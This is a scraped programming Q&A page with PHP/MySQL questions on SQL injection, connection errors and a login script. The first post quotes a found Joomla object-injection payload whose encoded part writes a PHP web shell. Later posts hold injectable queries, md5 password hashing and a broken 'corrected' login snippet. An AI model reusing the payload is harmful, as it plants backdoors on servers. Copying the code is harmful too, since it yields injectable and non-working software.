We Keep Coding

SQL injection Am I safe?

Today I saw this in my sql database:
| *some data* | }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:
{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:
{}s:8:"feed_url";s:207:"
eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));
JFactory::getConfig();
exit;";
s:19:"cache_name_function";
s:6:"assert";s:5:"cache"
;b:1;s:11:"cache_class";
O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}� |
I`m using this code to put data into database :
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$stmt = $conn->prepare("INSERT INTO $TABLE (VALUE, DEVICE) VALUES (?, ?)");
$stmt->bind_param("ss", $VALUE, $DEVICE);
$stmt->execute();
$stmt->close();
$conn->close();
?>
Am i safe ?
Is my code secure or should I add another layer of security?

How to forward a connection failed MySQL to a error page (500)

We made a simple php webpage with a InnoDB tabel, to monitor if InnoDB goes down.
When InnoDB / Mysql goes down we get a error: Connection failed: Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2 "No such file or directory")
But we wanna forward this to a custom error. Lik: InnoDB IS DOWN!!!
Any suggestions how we can do this?
<?php
$servername = "localhost";
$username = "root";
$password = "**************";
$dbname = "innodb";
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$sql = "SELECT status FROM monitoring";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
// output data of each row
while($row = $result->fetch_assoc()) {
echo "De status van InnoDB is: " . $row["status"]. "<br>";
}
} else {
echo "0 results";
}
$conn->close();
?>

It's simple, use something like this
<?php
// Configuration of database
// Check connection
if ($conn->connect_error) {
// die("InnoDB IS DOWN");
// OR
echo "<p>InnoDB IS DOWN</p>";
exit();
}
// Rest of your code
OR you may include an HTML page as well in the IF condition if ($conn->connect_error) like:
// Check connection
if ($conn->connect_error) {
include 'error_page.html';
exit();
}
// Rest of your code

getting error back from Prepared statement in case sql injection

I'm trying to test my prepared statement that is protecting one field to get the error message in case of SQL injection. I tried until now thousands of attacks, and all of the values I gave were accepted. Am I using a wrong syntax or attack? I can't see where the problem is. Here is my code:
try {
// $host = "localhost";
// $username = "root";
// $password = "root";
// $db_name = "pokemon";
$conn = new PDO('mysql:host='.$host.';dbname='.$db_name.';', $username, $password);
// set the PDO error mode to exception
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$meldung="";
$name =$_REQUEST['name'];
$gewicht = $_REQUEST['Gewicht'];
$größe =$_REQUEST['Größe'];
$spezies = $_REQUEST['Spezies'];
$stufe =$_REQUEST['Stufe'];
$atacke =$_REQUEST['Attacke'];
$array = explode(',', $_REQUEST['Attacke']);
$stmt = $conn->prepare("INSERT INTO Pokemon (`Name`,`Gewicht`,`grosse`,`spezies`,`stufe`) VALUES (:Name, '".$gewicht."', '".$größe."', '".$spezies."', '".$stufe."')");
$stmt->bindParam(':Name', $name);
// $stmt->bindParam(':Gewicht', $gewicht);
// $stmt->bindParam(':grosse', $größe);
// $stmt->bindParam(':spezies', $spezies);
// $stmt->bindParam(':stufe', $stufe);
$stmt->execute();
}
catch(PDOException $e)
{
$meldung = "Error: " . $e->getMessage();
echo $meldung;
}
thanks

Cannot connect to MySQL

I am trying to connect to MySQL server (hosted by godaddy) from php using PDO.
But I get this error :
An error occured : SQLSTATE[HY000] [2002] Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)
Note that this is not a database I host.
I was simply given the username and password to construct the database, create the users etc.
function ConnectToDb()
{
try{
$dns = 'mysql:host=1.1.1.1;dbname=dummyDbName';
$username = 'dummyUser';
$password = 'dummyPassword';
$LINK = new PDO($dns, $username, $password);
$LINK->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$LINK->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
if (!$LINK){
die('Could not connect : ' .mysql_error());
}
else{
return $LINK;
}
} catch (PDOException $ex){
echo "An error occured : " .$ex->getMessage();
}
}
I know that this works on localhost.
I'm using it no problem, but as soon as I try to connect to the live database it fails.
Anyone has an hint?
Thanks

Follow this format:
$user = "username";
$pass = "password";
$host = "localhost";
$db = "yourDbname";
$dns = "mysql:host=" . $host . ";dbname=" . $db;
$dbh = new PDO($dns, $user, $pass);
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
when you have to do a query (just an example):
$theid = 10;
$statement = $dbh->prepare('SELECT * FROM yourtable WHERE id = ? and name = ?');
$statement->execute(array($theid,'baronth'));
if you want to see if there's some errors while connecting or doing queryes (and you know how try-catch works), surround it with:
try {
all the code that you wan't to check
}
catch (PDOException $e) {
echo $e->getMessage();
}
it will echo the error.

php /mysql coding not working

i seem to be having an error on this coding any help would be appreciated
Parse error: parse error in C:\wamp\www\espn.com\login.php on line 19
<?php
//Database Information
$dbhost = "localhost";
$dbname = "users";
$dbuser = "root";
$dbpass = "*****";
//Connect to database
mysql_connect ( $dbhost, $dbuser, $dbpass)or die("Could not connect: ".mysql_error());
mysql_select_db($dbname) or die(mysql_error());
session_start();
$username = $_POST[‘username’];
$password = md5($_POST[‘password’]);
$query = “select * FROM users where 'username'=$username and 'password'= $password " ;
$result = mysql_query($query);
if (mysql_num_rows($result) != 1) {
$error = “Bad Login”;
include “login.html”;
} else {
$_SESSION[‘username’] = “$username”;
include “memberspage.php”;
}
?>

looks like you have a fancy quote on your query, so it's not a proper string
“ vs "

You are using odd quotes: “ instead of the proper ".
Probably happened while copying code from a web site.
The only valid string-delimiting quotes in PHP (and most other programming languages) are ' and ".

I want to tell you create a separate file/page for database connection. Suppose your connection file name is db_connection.php. Where you want to check only db_connection.php page will include. It saves your codding.
db_connection.php
<?php
//Database Information
$dbhost = "localhost";
$dbname = "users";
$dbuser = "root";
$dbpass = "*****";
//Connect to database
mysql_connect ( $dbhost, $dbuser, $dbpass)or die("Could not connect: ".mysql_error());
mysql_select_db($dbname) or die(mysql_error());
session_start();
?>
Now in your login page you include db_connection.php
loginpage:
<?php
include_once('db_connection.php');
if(isset($_POST['submit']) //submit is form button name
{
$username = $_POST[‘username’];
$password = md5($_POST[‘password’]);
$query = mysql_query(“select * FROM users where 'username'=$username and 'password'= $password ") ;
if (mysql_num_rows($result)>0) {
$_SESSION[‘username’] = “$username”;
header(location:memberspage.php);
} else {
$error = “Bad Login”;
header(location:memberspage.php);
}
?>